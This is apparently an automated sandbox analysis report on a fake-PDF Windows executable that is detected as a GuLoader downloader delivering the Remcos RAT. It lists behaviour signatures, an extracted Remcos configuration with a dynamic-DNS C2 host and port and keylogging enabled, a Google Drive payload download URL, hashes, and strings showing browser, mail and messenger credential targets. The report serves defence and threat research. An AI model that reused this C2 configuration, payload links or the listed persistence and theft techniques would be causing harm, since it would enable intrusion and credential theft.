Windows Analysis Report
Vyuctovani_2024_07-1206812497#U00b7pdf.exe

Overview

General Information

Sample name: Vyuctovani_2024_07-1206812497#U00b7pdf.exe
renamed because original name is a hash value
Original sample name: Vyuctovani_2024_07-1206812497pdf.exe
Analysis ID: 1465858
MD5: 3fb7cb8d7fd9efd2bc0cae35eb42c4fe
SHA1: ce06ab538757edb9b1d4cce656006da0d3795bb1
SHA256: 705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
Tags: exe
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: a458386d9.duckdns.org Virustotal: Detection: 12% Perma Link
Source: a458386d9.duckdns.org Virustotal: Detection: 12% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Virustotal: Detection: 14% Perma Link
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Virustotal: Detection: 14% Perma Link
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe ReversingLabs: Detection: 29%
Source: Yara match File source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 28_2_00404423
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_00406404 FindFirstFileW,FindClose, 0_2_00406404
Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe Code function: 0_2_004058B2 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004058B2
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 16_2_1FAB10F1
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 16_2_1FAB6580 FindFirstFileExA, 16_2_1FAB6580
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 28_2_0040AE51 FindFirstFileW,FindNextFileW, 28_2_0040AE51
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 29_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 29_2_00407EF8
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe Code function: 30_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 30_2_00407898
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe File opened: C:\Users\user~1\AppData\ Jump to behavior

Networking

barindex
Source: Malware configuration extractor URLs: a458386d9.duckdns.org
Source: unknown DNS query: name: a458386d9.duckdns.org
Source: global traffic TCP traffic: 192.168.2.7:49709 -> 217.76.50.73:3256
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 217.76.50.73 217.76.50.73
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Nubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Nubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Nubilum.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Nubilum.exe, 00000010.00000002.3695789252.000000001F110000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: Nubilum.exe, 00000010.00000002.3695789252.000000001F110000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: a458386d9.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhvCBB3.tmp.28.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvCBB3.tmp.28.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 00000018.00000002.3274791143.000002CE97600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: bhvCBB3.tmp.28.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvCBB3.tmp.28.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvCBB3.tmp.28.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: qmgr.db.24.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.24.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.24.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.24.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.24.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.24.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.24.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/3
Source: Nubilum.exe, 00000010.00000003.1685702542.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1668821147.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715637913.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1684092938.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002874000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715036233.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1899259790.0000000002873000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1661965344.000000001F588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp&-
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp(
Source: Nubilum.exe, 00000010.00000003.1668821147.0000000002871000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpB
Source: Nubilum.exe, 00000010.00000003.1661965344.000000001F588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpV
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpt
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvCBB3.tmp.28.dr String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.1646891249.00000000049A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Nubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: Nubilum.exe, Nubilum.exe, 0000001E.00000003.1694316092.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000003.1694047126.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: Nubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Nubilum.exe, 0000001E.00000003.1694316092.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000003.1694047126.00000000009CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comppData
Source: Nubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: Nubilum.exe, 0000001C.00000002.1711868301.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.1646891249.00000000049A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002798000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3695215003.000000001E560000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/x
Source: Nubilum.exe, 00000010.00000003.1635199343.0000000002822000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download
Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=downloadWw
Source: edb.log.24.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000018.00000003.1652121291.000002CE97500000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Nubilum.exe, 0000001C.00000002.1712947624.0000000000788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: Nubilum.exe, 0000001C.00000002.1712947624.0000000000788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: Nubilum.exe, 0000001C.00000002.1712947624.0000000000788000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: Nubilum.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.24.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Nubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Nubilum.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: Nubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
